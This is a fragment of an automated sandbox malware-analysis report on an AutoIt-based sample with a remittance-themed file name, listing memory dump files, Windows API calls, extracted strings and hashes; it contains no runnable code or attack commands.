                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                      • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                      • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                      • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                      APIs
                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                        • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Message_doexit
                                                                      • String ID: AutoIt$Error allocating memory.
                                                                      • API String ID: 1993061046-4017498283
                                                                      • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                      • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                      • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                      • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D